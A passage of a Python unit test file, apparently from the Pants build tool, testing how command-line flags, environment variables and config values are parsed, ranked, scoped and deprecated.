        type=bool,
        removal_version="999.99.9.dev0",
        removal_hint="say no to crufty global options",
    )
    register_global(
        "--global-delayed-deprecated-option",
        removal_version="999.99.9.dev0",
        deprecation_start_version="500.0.0.dev0",
    )
    register_global(
        "--global-delayed-but-already-passed-deprecated-option",
        removal_version="999.99.9.dev0",
        deprecation_start_version=_FAKE_CUR_VERSION,
    )

    # Test that an option past the `removal_version` fails at option registration time.
    with self.assertRaises(CodeRemovedError):
        register_global(
            "--global-crufty-expired",
            removal_version="0.0.1.dev0",
            removal_hint="use a less crufty global option",
        )

    # Mutual Exclusive options
    register_global("--mutex-foo", mutually_exclusive_group="mutex")
    register_global("--mutex-bar", mutually_exclusive_group="mutex")
    register_global("--mutex-baz", mutually_exclusive_group="mutex")

    register_global("--new-name")
    register_global("--old-name", mutually_exclusive_group="new_name")

    # For the design doc example test.
    options.register("compile", "--c", type=int, recursive=True)

    # Test deprecated options with a scope
    options.register("stale", "--still-good")
    options.register(
        "stale",
        "--crufty",
        removal_version="999.99.9.dev0",
        removal_hint="use a less crufty stale scoped option",
    )
    options.register(
        "stale",
        "--crufty-boolean",
        type=bool,
        removal_version="999.99.9.dev0",
        removal_hint="say no to crufty, stale scoped options",
    )

    # Test mutual exclusive options with a scope
    options.register("stale", "--mutex-a", mutually_exclusive_group="crufty_mutex")
    options.register("stale", "--mutex-b", mutually_exclusive_group="crufty_mutex")
    options.register("stale", "--crufty-old", mutually_exclusive_group="crufty_new")
    options.register("stale", "--crufty-new")

    # For task identity test
    options.register("compile.scala", "--modifycompile", fingerprint=True)
    options.register("compile.scala", "--modifylogs")
    options.register(
        "compile.scala",
        "--modifypassthrough",
        fingerprint=True,
        passthrough=True,
        type=list,
        member_type=str,
    )

    # For scoped env vars test
    options.register("simple", "--spam")
    options.register("simple-dashed", "--spam")
    options.register("scoped.a.bit", "--spam")
    options.register("scoped.and-dashed", "--spam")

    # For fromfile test
    options.register("fromfile", "--string")
    options.register("fromfile", "--intvalue", type=int)
    options.register("fromfile", "--dictvalue", type=dict)
    options.register("fromfile", "--listvalue", type=list)
    options.register("fromfile", "--appendvalue", type=list, member_type=int)

    # For fingerprint tests
    options.register("fingerprinting", "--inverted")  # Implicitly: daemon=True
    options.register("fingerprinting", "--definitely-not-inverted", daemon=False)
    options.register("fingerprinting", "--fingerprinted", fingerprint=True)
    options.register("fingerprinting", "--definitely-not-fingerprinted", fingerprint=False)

    # For enum tests
    options.register("enum-opt", "--some-enum", type=self.SomeEnumOption)
    # For testing the default value
    options.register(
        "separate-enum-opt-scope",
        "--some-enum-with-default",
        default=self.SomeEnumOption.a_value,
        type=self.SomeEnumOption,
    )
def test_env_var_of_type_int(self) -> None:
    # Scalar int and list[int] option values can be supplied via environment variables.
    create_options_object = partial(
        Options.create,
        config=self._create_config(),
        known_scope_infos=OptionsTest._known_scope_infos,
        args=shlex.split("./pants"),
    )
    options = create_options_object(env={"PANTS_FOO_BAR": "123"})
    options.register(GLOBAL_SCOPE, "--foo-bar", type=int)
    self.assertEqual(123, options.for_global_scope().foo_bar)

    options = create_options_object(env={"PANTS_FOO_BAR": "['123','456']"})
    options.register(GLOBAL_SCOPE, "--foo-bar", type=list, member_type=int)
    self.assertEqual([123, 456], options.for_global_scope().foo_bar)
def test_arg_scoping(self) -> None:
    """Smoke tests for flag parsing across scopes and the custom option types."""
    # Some basic smoke tests.
    options = self._parse(flags="--verbose")
    self.assertEqual(True, options.for_global_scope().verbose)
    options = self._parse(flags="-z compile path/to/tgt")
    self.assertEqual(["path/to/tgt"], options.specs)
    self.assertEqual(True, options.for_global_scope().verbose)

    with self.assertRaises(ParseError):
        self._parse(flags="--unregistered-option compile").for_global_scope()

    # Scoping of different values of the same option.
    # Also tests the --no-* boolean flag inverses.
    options = self._parse(flags="--verbose compile.java --no-verbose")
    self.assertEqual(True, options.for_global_scope().verbose)
    self.assertEqual(True, options.for_scope("compile").verbose)
    self.assertEqual(False, options.for_scope("compile.java").verbose)

    options = self._parse(
        flags="--verbose compile --no-verbose compile.java -z test test.junit --no-verbose"
    )
    self.assertEqual(True, options.for_global_scope().verbose)
    self.assertEqual(False, options.for_scope("compile").verbose)
    self.assertEqual(True, options.for_scope("compile.java").verbose)
    self.assertEqual(True, options.for_scope("test").verbose)
    self.assertEqual(False, options.for_scope("test.junit").verbose)

    # Test list-typed option.
    global_options = self._parse(config={"DEFAULT": {"y": ["88", "-99"]}}).for_global_scope()
    self.assertEqual([88, -99], global_options.y)

    # Flag values append to the config-supplied list rather than replacing it.
    global_options = self._parse(
        flags="--y=5 --y=-6 --y=77", config={"DEFAULT": {"y": ["88", "-99"]}}
    ).for_global_scope()
    self.assertEqual([88, -99, 5, -6, 77], global_options.y)

    global_options = self._parse().for_global_scope()
    self.assertEqual([], global_options.y)

    global_options = self._parse(
        env={"PANTS_CONFIG_OVERRIDE": "['123','456']"}
    ).for_global_scope()
    self.assertEqual(["123", "456"], global_options.config_override)

    global_options = self._parse(env={"PANTS_CONFIG_OVERRIDE": "['']"}).for_global_scope()
    self.assertEqual([""], global_options.config_override)

    # A bracketed flag value replaces (rather than appends to) the config default.
    global_options = self._parse(
        flags="--listy='[1, 2]'", config={"DEFAULT": {"listy": "[3, 4]"}}
    ).for_global_scope()
    self.assertEqual([1, 2], global_options.listy)

    # Test dict-typed option.
    global_options = self._parse(flags='--dicty=\'{"c": "d"}\'').for_global_scope()
    self.assertEqual({"c": "d"}, global_options.dicty)

    # Test list-of-dict-typed option.
    global_options = self._parse(
        flags='--dict-listy=\'[{"c": "d"}, {"e": "f"}]\''
    ).for_global_scope()
    self.assertEqual([{"c": "d"}, {"e": "f"}], global_options.dict_listy)

    # Test target-typed option.
    global_options = self._parse().for_global_scope()
    self.assertEqual("//:a", global_options.targety)
    global_options = self._parse(flags="--targety=//:foo").for_global_scope()
    self.assertEqual("//:foo", global_options.targety)

    # Test list-of-target-typed option.
    global_options = self._parse(
        flags='--target-listy=\'["//:foo", "//:bar"]\''
    ).for_global_scope()
    self.assertEqual(["//:foo", "//:bar"], global_options.target_listy)

    # Test file-typed option.
    with temporary_file_path() as fp:
        global_options = self._parse(flags=f'--filey="{fp}"').for_global_scope()
        self.assertEqual(fp, global_options.filey)

    # Test list-of-file-typed option.
    with temporary_file_path() as fp1:
        with temporary_file_path() as fp2:
            global_options = self._parse(
                flags=f'--file-listy="{fp1}" --file-listy="{fp2}"'
            ).for_global_scope()
            self.assertEqual([fp1, fp2], global_options.file_listy)
def test_explicit_boolean_values(self) -> None:
    """Lowercase and capitalized true/false literals all parse to real booleans."""
    cases = [("false", False), ("False", False), ("true", True), ("True", True)]
    for literal, want in cases:
        parsed = self._parse(flags=f"--verbose={literal}").for_global_scope()
        assert parsed.verbose is want
def test_boolean_defaults(self) -> None:
global_options = self._parse().for_global_scope()
self.assertFalse(global_options.store_true_flag)
self.assertTrue(global_options.store_false_flag)
self.assertFalse(global_options.store_true_def_false_flag)
self.assertTrue(global_options.store_true_def_true_flag)
self.assertFalse(global_options.store_false_def_false_flag)
self.assertTrue(global_options.store_false_def_true_flag)
self.assertIsNone(global_options.def_unset_bool_flag)
    def test_boolean_set_option(self) -> None:
        """A bare boolean flag applies its action: store-true options become True,
        store-false options become False, regardless of their registered default."""
        global_options = self._parse(
            flags="--store-true-flag --store-false-flag --store-true-def-true-flag "
            "--store-true-def-false-flag --store-false-def-true-flag --store-false-def-false-flag "
            "--def-unset-bool-flag"
        ).for_global_scope()
        self.assertTrue(global_options.store_true_flag)
        self.assertFalse(global_options.store_false_flag)
        self.assertTrue(global_options.store_true_def_false_flag)
        self.assertTrue(global_options.store_true_def_true_flag)
        self.assertFalse(global_options.store_false_def_false_flag)
        self.assertFalse(global_options.store_false_def_true_flag)
        # An option with no registered default is True when its bare flag is passed.
        self.assertTrue(global_options.def_unset_bool_flag)
    def test_boolean_negate_option(self) -> None:
        """A --no- prefixed flag applies the inverse action: store-true options become
        False and store-false options become True, regardless of their default."""
        global_options = self._parse(
            flags="--no-store-true-flag --no-store-false-flag --no-store-true-def-true-flag "
            "--no-store-true-def-false-flag --no-store-false-def-true-flag "
            "--no-store-false-def-false-flag --no-def-unset-bool-flag"
        ).for_global_scope()
        self.assertFalse(global_options.store_true_flag)
        self.assertTrue(global_options.store_false_flag)
        self.assertFalse(global_options.store_true_def_false_flag)
        self.assertFalse(global_options.store_true_def_true_flag)
        self.assertTrue(global_options.store_false_def_false_flag)
        self.assertTrue(global_options.store_false_def_true_flag)
        # An option with no registered default is False when negated.
        self.assertFalse(global_options.def_unset_bool_flag)
    def test_boolean_config_override(self) -> None:
        """A boolean set in the DEFAULT config section overrides the registered default,
        for both True and False values."""

        def assert_options_set(value: bool) -> None:
            # Set every boolean test option to `value` via config at once.
            global_options = self._parse(
                config={
                    "DEFAULT": {
                        "store_true_flag": value,
                        "store_false_flag": value,
                        "store_true_def_true_flag": value,
                        "store_true_def_false_flag": value,
                        "store_false_def_true_flag": value,
                        "store_false_def_false_flag": value,
                        "def_unset_bool_flag": value,
                    },
                },
            ).for_global_scope()
            assert global_options.store_true_flag == value
            assert global_options.store_false_flag == value
            assert global_options.store_true_def_false_flag == value
            assert global_options.store_true_def_true_flag == value
            assert global_options.store_false_def_false_flag == value
            assert global_options.store_false_def_true_flag == value
            assert global_options.def_unset_bool_flag == value

        assert_options_set(False)
        assert_options_set(True)
def test_boolean_invalid_value(self) -> None:
def assert_invalid_value(val) -> None:
with self.assertRaises(BooleanConversionError):
self._parse(config={"DEFAULT": {"store_true_flag": val}}).for_global_scope()
assert_invalid_value(11)
assert_invalid_value("AlmostTrue")
    def test_list_option(self) -> None:
        """List options support appending (`+[...]` or repeated single values), filtering
        (`-[...]`), and wholesale replacement (`[...]`), combined across the default,
        config, env, and flag sources (applied in that order of increasing rank)."""

        def check(
            *,
            expected: List[int],
            flags: str = "",
            env_val: Optional[str] = None,
            config_val: Optional[str] = None,
        ) -> None:
            env = {"PANTS_GLOBAL_LISTY": env_val} if env_val else None
            config = {"GLOBAL": {"listy": config_val}} if config_val else None
            global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
            assert global_options.listy == expected

        default = [1, 2, 3]
        check(expected=default)
        # Appending to the default.
        check(flags="--listy=4", expected=[*default, 4])
        check(flags="--listy=4 --listy=5", expected=[*default, 4, 5])
        check(flags="--listy=+[4,5]", expected=[*default, 4, 5])
        # Filtering from the default.
        check(flags="--listy=-[2]", expected=[1, 3])
        # Replacing the default.
        check(flags="--listy=[4,5]", expected=[4, 5])
        # Appending across env, config and flags (in the right order).
        check(
            flags="--listy=+[8,9]",
            env_val="+[6,7]",
            config_val="+[4,5]",
            expected=[*default, 4, 5, 6, 7, 8, 9],
        )
        # Appending and filtering across env, config and flags (in the right order).
        check(
            flags="--listy=-[1,5,6]", env_val="+[6,7]", config_val="+[4,5]", expected=[2, 3, 4, 7],
        )
        check(
            flags="--listy=+[8,9]",
            env_val="-[4,5]",
            config_val="+[4,5],-[3]",
            expected=[1, 2, 8, 9],
        )
        # Overwriting from env, then appending and filtering.
        check(
            flags="--listy=+[8,9],-[6]", env_val="[6,7]", config_val="+[4,5]", expected=[7, 8, 9],
        )
        # Overwriting from config, then appending.
        check(
            flags="--listy=+[8,9]",
            env_val="+[6,7]",
            config_val="[4,5]",
            expected=[4, 5, 6, 7, 8, 9],
        )
        # Overwriting from flags.
        check(
            flags="--listy=[8,9]", env_val="+[6,7]", config_val="+[4,5],-[8]", expected=[8, 9],
        )
        # Filtering all instances of repeated values.
        check(
            flags="--listy=-[5]",
            config_val="[1, 2, 5, 3, 4, 5, 6, 5, 5]",
            expected=[1, 2, 3, 4, 6],
        )
        # Filtering a value even though it was appended again at a higher rank.
        check(
            flags="--listy=+[4]", env_val="-[4]", config_val="+[4,5]", expected=[*default, 5],
        )
        # Filtering a value even though it was appended again at the same rank.
        check(
            env_val="-[4],+[4]", config_val="+[4,5]", expected=[*default, 5],
        )
        # Overwriting cancels filters.
        check(env_val="[4]", config_val="-[4]", expected=[4])
    def test_dict_list_option(self) -> None:
        """A list option with dict members: bare dict values append one element,
        `+[...]` appends several, and `[...]` replaces the default entirely."""

        def check(
            *,
            expected: List[Dict[str, int]],
            flags: str = "",
            env_val: Optional[str] = None,
            config_val: Optional[str] = None,
        ) -> None:
            env = {"PANTS_GLOBAL_DICT_LISTY": env_val} if env_val else None
            config = {"GLOBAL": {"dict_listy": config_val}} if config_val else None
            global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
            assert global_options.dict_listy == expected

        default = [{"a": 1, "b": 2}, {"c": 3}]
        one_element_appended = [*default, {"d": 4, "e": 5}]
        two_elements_appended = [*one_element_appended, {"f": 6}]
        replaced = [{"d": 4, "e": 5}, {"f": 6}]
        check(expected=default)
        # Via flags.
        check(flags='--dict-listy=\'{"d": 4, "e": 5}\'', expected=one_element_appended)
        check(
            flags='--dict-listy=\'{"d": 4, "e": 5}\' --dict-listy=\'{"f": 6}\'',
            expected=two_elements_appended,
        )
        check(
            flags='--dict-listy=\'+[{"d": 4, "e": 5}, {"f": 6}]\'', expected=two_elements_appended,
        )
        check(flags='--dict-listy=\'[{"d": 4, "e": 5}, {"f": 6}]\'', expected=replaced)
        # Via the environment.
        check(env_val='{"d": 4, "e": 5}', expected=one_element_appended)
        check(env_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
        check(env_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
        # Via config.
        check(config_val='{"d": 4, "e": 5}', expected=one_element_appended)
        check(config_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
        check(config_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
    def test_target_list_option(self) -> None:
        """A target-typed list option: single values and `+[...]` append to the default,
        `[...]` replaces it — via flags, env, or config."""

        def check(
            *,
            expected: List[str],
            flags: str = "",
            env_val: Optional[str] = None,
            config_val: Optional[str] = None,
        ) -> None:
            env = {"PANTS_GLOBAL_TARGET_LISTY": env_val} if env_val else None
            config = {"GLOBAL": {"target_listy": config_val}} if config_val else None
            global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
            assert global_options.target_listy == expected

        default = ["//:a", "//:b"]
        specified_args = ["//:c", "//:d"]
        all_args = [*default, *specified_args]
        check(expected=default)
        # Via flags.
        check(flags="--target-listy=//:c --target-listy=//:d", expected=all_args)
        check(flags='--target-listy=\'+["//:c", "//:d"]\'', expected=all_args)
        check(flags='--target-listy=\'["//:c", "//:d"]\'', expected=specified_args)
        # Via the environment.
        check(env_val="//:c", expected=[*default, "//:c"])
        check(env_val='+["//:c", "//:d"]', expected=all_args)
        check(env_val='["//:c", "//:d"]', expected=specified_args)
        # Via config.
        check(config_val="//:c", expected=[*default, "//:c"])
        check(config_val='+["//:c", "//:d"]', expected=all_args)
        check(config_val='["//:c", "//:d"]', expected=specified_args)
    def test_shell_str_list(self) -> None:
        """A shell_str-typed list option: a plain string value is shell-split into
        multiple appended members; `+[...]` appends and `[...]` replaces as usual."""

        def check(
            *,
            expected: List[str],
            flags: str = "",
            env_val: Optional[str] = None,
            config_val: Optional[str] = None,
        ) -> None:
            env = {"PANTS_GLOBAL_SHELL_STR_LISTY": env_val} if env_val else None
            config = {"GLOBAL": {"shell_str_listy": config_val}} if config_val else None
            global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
            assert global_options.shell_str_listy == expected

        default = ["--default1", "--default2=test"]
        specified_args = ["arg1", "arg2=foo", "--arg3"]
        all_args = [*default, *specified_args]
        check(expected=default)
        # Via flags ('arg1 arg2=foo' splits into two members).
        check(
            flags="--shell-str-listy='arg1 arg2=foo' --shell-str-listy='--arg3'", expected=all_args
        )
        check(flags="""--shell-str-listy='+["arg1 arg2=foo", "--arg3"]'""", expected=all_args)
        check(flags="""--shell-str-listy='["arg1 arg2=foo", "--arg3"]'""", expected=specified_args)
        # Via the environment.
        check(env_val="arg1 arg2=foo --arg3", expected=all_args)
        check(env_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
        check(env_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
        # Via config.
        check(config_val="arg1 arg2=foo --arg3", expected=all_args)
        check(config_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
        check(config_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
    def test_dict_option(self) -> None:
        """A dict option: `{...}` replaces the default, `+{...}` extends it, and when the
        same key is set at several ranks the highest-rank value wins."""

        def check(
            *, expected: Dict[str, str], flags: str = "", config_val: Optional[str] = None,
        ) -> None:
            config = {"GLOBAL": {"dicty": config_val}} if config_val else None
            global_options = self._parse(flags=flags, config=config).for_global_scope()
            assert global_options.dicty == expected

        default = {"a": "b"}
        specified_args = {"c": "d"}
        all_args = {**default, **specified_args}
        check(expected=default)
        check(flags='--dicty=\'{"c": "d"}\'', expected=specified_args)
        check(flags='--dicty=\'+{"c": "d"}\'', expected=all_args)
        check(config_val='{"c": "d"}', expected=specified_args)
        check(config_val='+{"c": "d"}', expected=all_args)
        check(
            config_val='+{"c": "d"}',
            flags='--dicty=\'+{"e": "f"}\'',
            expected={**all_args, "e": "f"},
        )
        # Check that highest rank wins if we have multiple values for the same key.
        check(config_val='+{"a": "b+", "c": "d"}', expected={"a": "b+", "c": "d"})
        check(
            config_val='+{"a": "b+", "c": "d"}',
            flags='--dicty=\'+{"a": "b++"}\'',
            expected={"a": "b++", "c": "d"},
        )
    def test_defaults(self) -> None:
        """Option values resolve through flags > env > config > hardcoded defaults,
        with subscopes (e.g. compile.java) inheriting from their enclosing scope."""
        # Hard-coded defaults.
        options = self._parse(flags="compile.java -n33")
        self.assertEqual(99, options.for_global_scope().num)
        self.assertEqual(99, options.for_scope("compile").num)
        self.assertEqual(33, options.for_scope("compile.java").num)
        self.assertEqual(99, options.for_scope("test").num)
        self.assertEqual(99, options.for_scope("test.junit").num)
        options = self._parse(flags="compile -n22 compile.java -n33")
        self.assertEqual(99, options.for_global_scope().num)
        self.assertEqual(22, options.for_scope("compile").num)
        self.assertEqual(33, options.for_scope("compile.java").num)
        # Get defaults from config and environment.
        config = {"DEFAULT": {"num": "88"}, "compile": {"num": "77"}, "compile.java": {"num": "66"}}
        options = self._parse(flags="compile.java -n22", config=config)
        self.assertEqual(88, options.for_global_scope().num)
        self.assertEqual(77, options.for_scope("compile").num)
        self.assertEqual(22, options.for_scope("compile.java").num)
        env = {"PANTS_COMPILE_NUM": "55"}
        options = self._parse(flags="compile", env=env, config=config)
        self.assertEqual(88, options.for_global_scope().num)
        self.assertEqual(55, options.for_scope("compile").num)
        # The env value on `compile` beats the config value on `compile.java`.
        self.assertEqual(55, options.for_scope("compile.java").num)
        options = self._parse(flags="compile.java -n44", env=env, config=config)
        self.assertEqual(88, options.for_global_scope().num)
        self.assertEqual(55, options.for_scope("compile").num)
        self.assertEqual(44, options.for_scope("compile.java").num)
def test_choices(self) -> None:
options = self._parse(flags="--str-choices=foo")
self.assertEqual("foo", options.for_global_scope().str_choices)
options = self._parse(config={"DEFAULT": {"str_choices": "bar"}})
self.assertEqual("bar", options.for_global_scope().str_choices)
with self.assertRaises(ParseError):
options = self._parse(flags="--str-choices=baz")
options.for_global_scope()
with self.assertRaises(ParseError):
options = self._parse(config={"DEFAULT": {"str_choices": "baz"}})
options.for_global_scope()
options = self._parse(flags="--int-choices=42 --int-choices=99")
self.assertEqual([42, 99], options.for_global_scope().int_choices)
def test_parse_name_and_dest(self) -> None:
self.assertEqual(("thing", "thing"), Parser.parse_name_and_dest("--thing"))
self.assertEqual(
("thing", "other_thing"), Parser.parse_name_and_dest("--thing", dest="other_thing")
)
def test_validation(self) -> None:
def assertError(expected_error, *args, **kwargs):
with self.assertRaises(expected_error):
options = Options.create(
args=[],
env={},
config=self._create_config(),
known_scope_infos=[global_scope()],
)
options.register(GLOBAL_SCOPE, *args, **kwargs)
options.for_global_scope()
assertError(NoOptionNames)
assertError(OptionNameDash, "badname")
assertError(OptionNameDoubleDash, "-badname")
assertError(InvalidKwarg, "--foo", badkwarg=42)
assertError(ImplicitValIsNone, "--foo", implicit_value=None)
assertError(BooleanOptionNameWithNo, "--no-foo", type=bool)
assertError(MemberTypeNotAllowed, "--foo", member_type=int)
assertError(MemberTypeNotAllowed, "--foo", type=dict, member_type=int)
assertError(InvalidMemberType, "--foo", type=list, member_type=set)
assertError(InvalidMemberType, "--foo", type=list, member_type=list)
assertError(InvalidMemberType, "--foo", type=list, member_type=list)
def test_implicit_value(self) -> None:
def check(*, flag: str = "", expected: str) -> None:
options = self._parse(flags=flag)
assert options.for_global_scope().implicit_valuey == expected
check(expected="default")
check(flag="--implicit-valuey", expected="implicit")
check(flag="--implicit-valuey=explicit", expected="explicit")
    def test_shadowing(self) -> None:
        """Registering an option name that collides with one in a related scope raises
        Shadowing — even when the colliding flag is only one of several registered."""
        options = Options.create(
            env={},
            config=self._create_config(),
            known_scope_infos=[global_scope(), task("bar"), intermediate("foo"), task("foo.bar")],
            args=["./pants"],
        )
        options.register("", "--opt1")
        options.register("foo", "-o", "--opt2")

        def assert_raises_shadowing(*, scope: str, args: List[str]) -> None:
            with self.assertRaises(Shadowing):
                options.register(scope, *args)

        assert_raises_shadowing(scope="", args=["--opt2"])
        assert_raises_shadowing(scope="bar", args=["--opt1"])
        assert_raises_shadowing(scope="foo.bar", args=["--opt1"])
        assert_raises_shadowing(scope="foo.bar", args=["--opt2"])
        # The shadowing flag triggers the error even alongside a fresh, valid flag.
        assert_raises_shadowing(scope="foo.bar", args=["--opt1", "--opt3"])
        assert_raises_shadowing(scope="foo.bar", args=["--opt3", "--opt2"])
    def test_recursion(self) -> None:
        """Recursive options may be set on subscopes; non-recursive ones may not."""
        # Recursive option.
        options = self._parse(flags="-n=5 compile -n=6")
        self.assertEqual(5, options.for_global_scope().num)
        self.assertEqual(6, options.for_scope("compile").num)
        # Non-recursive option.
        options = self._parse(flags="--bar-baz=foo")
        self.assertEqual("foo", options.for_global_scope().bar_baz)
        options = self._parse(flags="compile --bar-baz=foo")
        # Setting the non-recursive global option on a subscope is a parse error.
        with self.assertRaises(ParseError):
            options.for_scope("compile")
    def test_no_recursive_subsystem_options(self) -> None:
        """Passing `recursive=` (either value) when registering a subsystem option raises
        RecursiveSubsystemOption."""
        options = Options.create(
            env={},
            config=self._create_config(),
            known_scope_infos=[global_scope(), subsystem("foo")],
            args=["./pants"],
        )
        # All subsystem options are implicitly recursive (a subscope of subsystem scope represents
        # a separate instance of the subsystem, so it needs all the options).
        # We disallow explicit specification of recursive (even if set to True), to avoid confusion.
        with self.assertRaises(RecursiveSubsystemOption):
            options.register("foo", "--bar", recursive=False)
            options.for_scope("foo")
        with self.assertRaises(RecursiveSubsystemOption):
            options.register("foo", "--baz", recursive=True)
            options.for_scope("foo")
def test_is_known_scope(self) -> None:
options = self._parse()
for scope_info in self._known_scope_infos:
self.assertTrue(options.is_known_scope(scope_info.scope))
self.assertFalse(options.is_known_scope("nonexistent_scope"))
    def test_designdoc_example(self) -> None:
        """The worked precedence example from the options design doc."""
        # The example from the design doc.
        # Get defaults from config and environment.
        config = {
            "DEFAULT": {"b": "99"},
            "compile": {"a": "88", "c": "77"},
        }
        env = {"PANTS_COMPILE_C": "66"}
        options = self._parse(
            flags="--a=1 compile --b=2 compile.java --a=3 --c=4", env=env, config=config,
        )
        self.assertEqual(1, options.for_global_scope().a)
        self.assertEqual(99, options.for_global_scope().b)
        # `c` is never set at the global scope, so attribute access there fails.
        with self.assertRaises(AttributeError):
            options.for_global_scope().c
        self.assertEqual(1, options.for_scope("compile").a)
        self.assertEqual(2, options.for_scope("compile").b)
        self.assertEqual(66, options.for_scope("compile").c)
        self.assertEqual(3, options.for_scope("compile.java").a)
        self.assertEqual(2, options.for_scope("compile.java").b)
        self.assertEqual(4, options.for_scope("compile.java").c)
    def test_file_spec_args(self) -> None:
        """Specs listed in a --spec-file are merged with specs from the command line."""
        with temporary_file(binary_mode=False) as tmp:
            tmp.write(
                dedent(
                    """
                    foo
                    bar
                    """
                )
            )
            tmp.flush()
            # Note that we prevent loading a real pants.toml during get_bootstrap_options().
            flags = f'--spec-file={tmp.name} --pants-config-files="[]" compile morx:tgt fleem:tgt'
            bootstrapper = OptionsBootstrapper.create(args=shlex.split(f"./pants {flags}"))
            bootstrap_options = bootstrapper.bootstrap_options.for_global_scope()
            options = self._parse(flags=flags, bootstrap_option_values=bootstrap_options)
            # Specs from the file (foo, bar) merge with those from the CLI.
            sorted_specs = sorted(options.specs)
            self.assertEqual(["bar", "fleem:tgt", "foo", "morx:tgt"], sorted_specs)
def test_passthru_args_subsystems_and_goals(self):
# Test that passthrough args are applied.
options = self._parse(flags="")
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("test"), subsystem("passconsumer")],
args=["./pants", "test", "target", "--", "bar", "--baz"],
)
options.register(
"passconsumer", "--passthing", passthrough=True, type=list, member_type=str
)
self.assertEqual(["bar", "--baz"], options.for_scope("passconsumer").passthing)
    def test_at_most_one_goal_with_passthru_args(self):
        """Passthrough args combined with more than one goal are rejected as ambiguous."""
        with self.assertRaisesWithMessageContaining(
            Options.AmbiguousPassthroughError,
            """Specifying multiple goals (in this case: ['test', 'fmt']) """
            """along with passthrough args (args after `--`) is ambiguous.""",
        ):
            _ = Options.create(
                env={},
                config={},
                known_scope_infos=[global_scope(), task("test"), task("fmt")],
                args=["./pants", "test", "fmt", "target", "--", "bar", "--baz"],
            )
    def test_global_scope_env_vars(self):
        """Env var spellings for global options, in decreasing precedence:
        PANTS_GLOBAL_<OPT>, PANTS_<OPT>, then (only for options named pants_*) <OPT>."""

        def check_pants_foo(expected_val, env):
            val = self._parse(env=env).for_global_scope().pants_foo
            self.assertEqual(expected_val, val)

        check_pants_foo(
            "AAA", {"PANTS_GLOBAL_PANTS_FOO": "AAA", "PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"}
        )
        check_pants_foo("BBB", {"PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"})
        check_pants_foo("CCC", {"PANTS_FOO": "CCC"})
        check_pants_foo(None, {})
        # Check that an empty string is distinct from no value being specified.
        check_pants_foo("", {"PANTS_PANTS_FOO": "", "PANTS_FOO": "CCC"})

        # A global option that doesn't begin with 'pants-': Setting BAR_BAZ should have no effect.

        def check_bar_baz(expected_val, env):
            val = self._parse(env=env).for_global_scope().bar_baz
            self.assertEqual(expected_val, val)

        check_bar_baz(
            "AAA", {"PANTS_GLOBAL_BAR_BAZ": "AAA", "PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"}
        )
        check_bar_baz("BBB", {"PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"})
        check_bar_baz(None, {"BAR_BAZ": "CCC"})
        check_bar_baz(None, {})
def test_scoped_env_vars(self) -> None:
def check_scoped_spam(scope, expected_val, env):
val = self._parse(env=env).for_scope(scope).spam
self.assertEqual(expected_val, val)
check_scoped_spam("simple", "value", {"PANTS_SIMPLE_SPAM": "value"})
check_scoped_spam("simple-dashed", "value", {"PANTS_SIMPLE_DASHED_SPAM": "value"})
check_scoped_spam("scoped.a.bit", "value", {"PANTS_SCOPED_A_BIT_SPAM": "value"})
check_scoped_spam("scoped.and-dashed", "value", {"PANTS_SCOPED_AND_DASHED_SPAM": "value"})
    def test_drop_flag_values(self) -> None:
        """drop_flag_values yields a view with all flag-supplied values discarded,
        falling back to env, config, or hardcoded defaults for each option."""
        options = self._parse(
            flags="--bar-baz=fred -n33 --pants-foo=red enum-opt --some-enum=another-value simple -n1",
            env={"PANTS_FOO": "BAR"},
            config={"simple": {"num": 42}, "enum-opt": {"some-enum": "a-value"}},
        )
        defaulted_only_options = options.drop_flag_values()
        # No option value supplied in any form.
        self.assertEqual("fred", options.for_global_scope().bar_baz)
        self.assertIsNone(defaulted_only_options.for_global_scope().bar_baz)
        # A defaulted option value.
        self.assertEqual(33, options.for_global_scope().num)
        self.assertEqual(99, defaulted_only_options.for_global_scope().num)
        # A config specified option value.
        self.assertEqual(1, options.for_scope("simple").num)
        self.assertEqual(42, defaulted_only_options.for_scope("simple").num)
        # An env var specified option value.
        self.assertEqual("red", options.for_global_scope().pants_foo)
        self.assertEqual("BAR", defaulted_only_options.for_global_scope().pants_foo)
        # Overriding an enum option value.
        self.assertEqual(self.SomeEnumOption.another_value, options.for_scope("enum-opt").some_enum)
        # Getting the default value for an enum option.
        self.assertEqual(
            self.SomeEnumOption.a_value,
            defaulted_only_options.for_scope("separate-enum-opt-scope").some_enum_with_default,
        )
    def test_enum_option_type_parse_error(self) -> None:
        """An invalid enum value yields a ParseError naming the option and its scope."""
        self.maxDiff = None
        with self.assertRaisesWithMessageContaining(
            ParseError,
            "Error applying type 'SomeEnumOption' to option value 'invalid-value', for option "
            "'--some_enum' in scope 'enum-opt'",
        ):
            options = self._parse(flags="enum-opt --some-enum=invalid-value")
            # The error surfaces lazily, on scope access.
            options.for_scope("enum-opt").some_enum
def assertOptionWarning(self, w, option_string):
single_warning = assert_single_element(w)
self.assertEqual(single_warning.category, DeprecationWarning)
warning_message = str(single_warning.message)
self.assertIn("will be removed in version", warning_message)
self.assertIn(option_string, warning_message)
    def test_deprecated_options(self) -> None:
        """Setting a deprecated option — via flag, env, or config, global or scoped —
        triggers exactly one DeprecationWarning naming the option, while still
        applying the supplied value. Non-deprecated options stay silent."""

        def assert_deprecation_triggered(
            *,
            flags: str = "",
            option: str,
            expected: Union[str, bool],
            scope: Optional[str] = None,
            env: Optional[Dict[str, str]] = None,
            config: Optional[Dict[str, Dict[str, str]]] = None,
        ) -> None:
            with self.warnings_catcher() as w:
                options = self._parse(flags=flags, env=env, config=config)
                scoped_options = (
